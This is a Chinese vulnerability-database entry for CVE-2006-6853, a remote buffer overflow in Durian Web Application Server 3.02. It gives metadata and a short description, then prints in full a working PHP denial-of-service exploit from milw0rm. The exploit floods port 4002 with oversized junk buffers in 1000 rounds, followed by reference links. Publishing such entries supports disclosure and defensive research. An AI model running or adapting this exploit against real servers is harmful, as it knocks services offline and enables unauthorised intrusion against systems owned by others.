Durian Web应用服务器恶意畸形请求远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111899 漏洞类型 缓冲区溢出
发布时间 2006-12-29 更新时间 2007-01-04
CVE编号 CVE-2006-6853 CNNVD-ID CNNVD-200612-713
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3038
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-713
|漏洞详情
Durian是一款免费的Web应用服务器,用于以APS或DWS语言生成交互的动态Web内容。Durian在处理恶意畸形请求时存在缓冲区溢出漏洞,远程攻击者可以利用此漏洞导致拒绝服务或执行任意指令。
|漏洞EXP
<?php
//Durian Web Application Server 3.02 freeware for Win32 denial of service exploit
//this will merely show 1000 access violation boxes to screen
//software site -> http://sourceforge.net/projects/durian/

//by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org

error_reporting(E_ALL);
$service_port = "4002";
$address = "192.168.1.3";

$ch  =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
$c=1000;

for ($m=1; $m<=$c; $m++){
    for ($j=0; $j<3; $j++){
        for ($i=0; $i<8; $i++){
            $junk="";
            for ($k=1; $k<=$size[$i]; $k++){
                $junk.=$ch[$j];
            }
            echo "buf size:".$size[$i]."|char:".$ch[$j]."\n";
            $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if ($socket < 0) {
                die("socket_create() failed:\n reason: " . socket_strerror($socket) . "\n");
            }
            $result = socket_connect($socket, $address, $service_port);
            if ($result < 0) {
                die("socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n");
            }
            $in = $junk;
            socket_write($socket, $in, strlen ($in));
            socket_close($socket);
        }
   }
sleep(1);
}
?>

# milw0rm.com [2006-12-29]
|参考资料

来源:XF
名称:durian-web-bo(31161)
链接:http://xforce.iss.net/xforce/xfdb/31161
来源:BID
名称:21808
链接:http://www.securityfocus.com/bid/21808
来源:MILW0RM
名称:3038
链接:http://www.milw0rm.com/exploits/3038
来源:MILW0RM
名称:3037
链接:http://www.milw0rm.com/exploits/3037
来源:SECTRACK
名称:1017456
链接:http://securitytracker.com/id?1017456
来源:MILW0RM
名称:3038
链接:http://milw0rm.com/exploits/3038
来源:MILW0RM
名称:3037
链接:http://milw0rm.com/exploits/3037
来源:NSFOCUS
名称:9745
链接:http://www.nsfocus.net/vulndb/9745